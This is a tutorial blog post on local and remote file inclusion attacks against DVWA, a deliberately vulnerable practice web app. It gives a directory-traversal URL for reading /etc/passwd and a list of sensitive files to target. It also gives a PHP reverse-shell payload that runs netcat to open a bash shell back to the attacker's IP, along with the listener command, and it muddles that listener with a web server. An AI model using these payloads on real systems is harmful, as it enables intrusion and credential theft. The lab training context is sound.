DVWA: Damn Vulnerable Web Application File Inclusion Using Netcat As Web Server (Low Security)

 

"Disclaimer: The information provided in this article is intended for educational and research purposes only. It is not intended to promote or encourage any illegal or unethical activities. Always act responsibly and obtain proper consent before using any tools or techniques described in this article."

 Damn Vulnerable Web App (DVWA) is a web application that is coded in PHP and uses MySQL database, where we can practice some common web vulnerabilities with different levels of security. Basically, it is a place where we can legally test our hacking ability. In this article, we’re only going to talk about one of the attacks in DVWA, File Inclusion. 

So what is file inclusion and why is it a big deal?

When a web application allows the user to specify input directly to the file streams or upload files, it’s opening an attack vector to execute malicious code. If the malicious code file is in the target machine, this attack is called Local File Inclusion (LFI). If the files are external, it’s called Remote File Inclusion (RFI).

This is one more article in the DVWA series. You can grab all articles here.

Local File Inclusion

Open your browser, enter DVWA URL, log in and navigate to the ‘file inclusion’ page.

If we click on the links file1.php, file2.php, and file3.php and look at the generated URL, we can see that the filename is inserted in each page. Let’s tamper with the URL:

10.0.2.6/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd

The ‘../’ characters used in the example above represent a directory traversal. The number of ‘../’ sequences depends on the configuration and location of the target web server on the victim machine. Some experimentation may be required.

We can see that the contents of /etc/passwd are displayed on the screen. A lot of useful information about the host can be obtained this way. Some interesting files to look for include, but are not limited to: 

– /etc/issue

– /proc/version

– /etc/profile

– /etc/passwd

– /etc/passwd

– /etc/shadow

– /root/.bash_history

– /var/log/dmessage

– /var/mail/root

– /var/spool/cron/crontabs/root

 Sometimes during a Local File Inclusion, the web server appends ‘.php’ to the included file. 

For example, including ‘/etc/passwd’ gets rendered as ‘/etc/passwd.php’. This occurs when the include function uses a parameter like ?page and concatenates the .php extension to the file. 

In versions of PHP below 5.3, ending the URL with a null byte (%00) would cause the interpreter to stop reading, which would allow the attacker to include their intended page.

Remote File Inclusion (RFI)

The abbreviation of Remote File Inclusion is "RFI", which means that hackers attack the Web system through external files.
Hackers can first find a web space, create a PHP file, and then let your system load this PHP by entering a special path, and then obtain the administrator account; password, or member information through PHP Script.

First, restart Kali's Apaches

To run our file we need to place it in a location - /var/www/html

Write a piece of program code for php reverse and save it as php and put it in var/www/html. The program mainly executes nc to return to our Kali. Remember that the IP of the code is the host IP of our Kali.

<?php

passthru("nc.traditional -e /bin/bash 10.0.2.4 12345")

?> 

Now, establish a simple web server to serve the file using Netcat (NC).

nc -lvp 12345

 Now, append this URL to the DVWA address:

http://10.0.2.6/dvwa/vulnerabilities/fi/?page=http://10.0.2.4/coder.php

This is it. Target hacked.

If you got stuck or have any questions, leave a comment, and I’ll do my best to get back to you.